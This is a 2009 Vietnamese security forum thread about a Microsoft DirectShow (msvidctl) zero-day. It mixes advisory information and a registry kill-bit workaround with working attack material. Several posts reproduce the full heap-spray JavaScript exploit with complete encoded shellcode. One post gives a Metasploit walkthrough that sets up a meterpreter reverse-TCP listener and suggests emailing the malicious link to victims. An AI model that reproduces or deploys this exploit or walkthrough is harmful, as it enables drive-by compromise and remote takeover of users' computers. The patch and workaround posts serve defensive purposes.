0-day in Microsoft DirectShow - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

0-day in Microsoft DirectShow

[Announcement] 0-day in Microsoft DirectShow	07/07/2009 20:08:32 (+0700) \| #1 \| 185648

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

Theo http://isc.sans.org/diary.html?storyid=6733&rss cảnh báo, msvidctl.dll được sử dụng để làm bàn đạp để tấn công. Theo đánh giá của trang http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799 (trang nguyên thủy disclose thông tin này) thì exploit này cho phép kiểm soát máy của nạn nhân từ xa.

Sans cho biết:

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

(Theo CSIS, một 0-day exploit được tìm thấy trong msvidctl.dll của DirectShow đang được khai thác xuyên qua phương tiện sử dụng hàng ngàn web site đã bị khống chế gần đây. code exploit đã được công bố rộng rãi xuyên qua một số trang web của Trung Quốc).

Đoạn code exploit được csis công bố:

Code:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
" + [SNIP] (đoạn shell code hoàn chỉnh đã được tháo bỏ vì lý do bảo mật).

var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Trước mắt, CSIS đưa ra biện pháp "work around":
Code:

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Cho đến nay, Microsoft vẫn chưa công bố bản vá nhưng họ đang làm việc khẩn cấp để fix lổ hổng này. Đây là Advisory chính thức của MS: http://www.microsoft.com/technet/security/advisory/972890.mspx

Thông tin này cũng được thông báo rộng rãi trên một số nhật báo ở Úc: http://www.theage.com.au/technology/security/security-hole-microsoft-issues-rare-warning-20090707-dapa.html và http://www.smh.com.au/technology/security/security-hole-microsoft-issues-rare-warning-20090707-dapa.html)

Cách tốt nhất hiện nay: không dùng Internet Explorer.

What bringing us together is stronger than what pulling us apart.

[Announcement] 0-day in Microsoft DirectShow	07/07/2009 22:53:55 (+0700) \| #2 \| 185667

vikjava
Elite Member

Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline

http://go.microsoft.com/?linkid=9672398 đã có bản fix tại đây

[Announcement] 0-day in Microsoft DirectShow	08/07/2009 04:17:53 (+0700) \| #3 \| 185711

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Lỗi này là IE 0-day exploit. Chỉ có tác dụng với IE vì nó thuộc về ActiveX của DirectShow, bác nào sử dụng Firefox thì vẫn an toàn không cần update. Cái nội dung file reg được công bố trên sans để disable ActiveX bị sai format:
Code:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[Announcement] 0-day in Microsoft DirectShow	09/07/2009 06:03:34 (+0700) \| #4 \| 185808

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

đây là đoạn sh3llode hoàn chỉnh

Code:

var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +

                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +

                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +

                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +

                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +

                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +

                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +

                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +

                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +

                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +

                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +

                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +

                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +

                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +

                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +

                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +

                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +

                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +

                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +

                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +

                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +

                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +

                          "%u314e%u7475%u7038%u7765%u4370");



var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Thử nghiệm thành công trên nền tảng sau đây (đầy đủ patched 06/07/09):

- Trình duyệt Internet Explorer 6, Windows XP SP2
- Trình duyệt Internet Explorer 7, Windows XP SP3

đây là đoạn 2 đoạn Ruby script được xây dựng để kích hoạt lỗi:

http://www.rec-sec.com/exploits/msf/msvidctl_mpeg2.rb

http://www.rec-sec.com/code/msvidctl_gif.rb

download ruby : http://www.ruby-lang.org/en/

update bản metasploit mới nhất về để hack

ai dùng linux thì vào thư mục của metasploit rồi gõ lệnh : svn update ,để update những gì mới nhất trong kho của metasploit

hường dẫn sử dụng metasploit:

Code:

http://thegioimang.org/forum/tham-nhap-trong-microsoft/1515-tam-quan-trong-cua-update-metasploit-attack.html

HaCk t0 LeArN,N0t LeArN t0 HaCk

[Announcement] 0-day in Microsoft DirectShow	14/07/2009 06:06:42 (+0700) \| #5 \| 186208

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

hướng dẫn khai thác 0-day in Microsoft DirectShow với metasploit:

em bắt đầu bằng cách chạy msfconsole sau khi Metasploit đã cập nhật phiên bản mới nhất:

Code:

holiganvn@root:~/svn/msf3-dev$ sudo ./msfconsole 

[sudo] password for holiganvn: 

                |                    |      _) |   

 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 

 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   

_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 

                              _|                   

       =[ msf v3.3-dev

+ -- --=[ 384 exploits - 261 payloads

+ -- --=[ 20 encoders - 7 nops

       =[ 166 aux

msf >

em nạp mô-đun khai thác:

Code:

msf > use exploit/windows/browser/msvidctl_mpeg2 

msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp 

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(msvidctl_mpeg2) > show options

Module options:

   Name     Current Setting  Required  Description                                          

   ----     ---------------  --------  -----------                                          

   SRVHOST  0.0.0.0          yes       The local host to listen on.                         

   SRVPORT  8080             yes       The local port to listen on.                         

   SSL      false            no        Use SSL                                              

   URIPATH                   no        The URI to use for this exploit (default is random)  

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description                           

   ----      ---------------  --------  -----------                           

   EXITFUNC  process          yes       Exit technique: seh, thread, process  

   LHOST                      yes       The local address                     

   LPORT     4444             yes       The local port                        

Exploit target:

   Id  Name                                        

   --  ----                                        

   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

em thiết lập các biến Payload và Khai thác mô-đun:

Code:

msf exploit(msvidctl_mpeg2) > set SRVPORT 80

SRVPORT => 80

msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158

LHOST => 192.168.1.158

msf exploit(msvidctl_mpeg2) > set URIPATH secure.html

URIPATH => secure.html

msf exploit(msvidctl_mpeg2) > exploit

[*] Exploit running as background job.

msf exploit(msvidctl_mpeg2) > 

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Using url: http://0.0.0.0:80/secure.html

[*]  Local IP: http://192.168.1.158:80/secure.html

[*] Server started.

Bây giờ chúng ta có thể khai thác bug ở một tệp HTML với GIF để khai thác một mục tiêu. Bạn có thể gửi các liên kết đến một mục tiêu người sử dụng trong một thư điện tử hoặc thông qua bất cứ phương pháp khác và một khi người dùng nhấn vào liên kết và mở Internet Explorer,như vậy chúng ta đã có thể khai thác vào máy của victim:

link test:

Code:

http://fb.coru.in/0msvidctl.zip

HaCk t0 LeArN,N0t LeArN t0 HaCk

[Announcement] 0-day in Microsoft DirectShow	15/07/2009 00:18:04 (+0700) \| #6 \| 186244

Bướm Đêm
Member

Joined: 25/03/2008 18:30:01
Messages: 223
Location: Phố Hoa
Offline

up :
13mb FULL framework: https://metasploit.com/framework-3.3-dev.exe
5mb MINI (just msfconsole): https://metasploit.com/mini-3.3-dev.exe
http://metasploit.com/svn/framework3/trunk/

GZ tqf zìeq ˘ऐ xखc sड़e cav xন qrqr

[Announcement] 0-day in Microsoft DirectShow	15/07/2009 05:43:52 (+0700) \| #7 \| 186292

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

trong *nix thì các bác dùng lệnh dưới để cập nhật cho metasploit :

Code:

svn update

HaCk t0 LeArN,N0t LeArN t0 HaCk

[Announcement] 0-day in Microsoft DirectShow	15/07/2009 07:06:45 (+0700) \| #8 \| 186298

winwinwin
Member

Joined: 11/05/2009 21:07:31
Messages: 29
Offline

bản vá lỗi tại đây http://go.microsoft.com/?linkid=9672398
Thiết lập kill bit trong registry để ngăn chặn Internet Explorer tiếp xúc với thành phần COM nguy hiểm tại đây
http://blog.bkis.com/wp-content/uploads/2009/07/killbitdirectshow.reg smilie

Theo bkis.

[Announcement] 0-day in Microsoft DirectShow	13/08/2009 16:23:30 (+0700) \| #9 \| 189848

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

Metasploit 3.3-dev for win32:

/hvaonline/posts/list/29873.html#184276

bản metasploit v3.3 cho linux:

http://www.telesphoreo.org/browser/trunk/data/metasploit3/framework-3.3.tar.gz

HaCk t0 LeArN,N0t LeArN t0 HaCk

Go to:

Users currently in here
1 Anonymous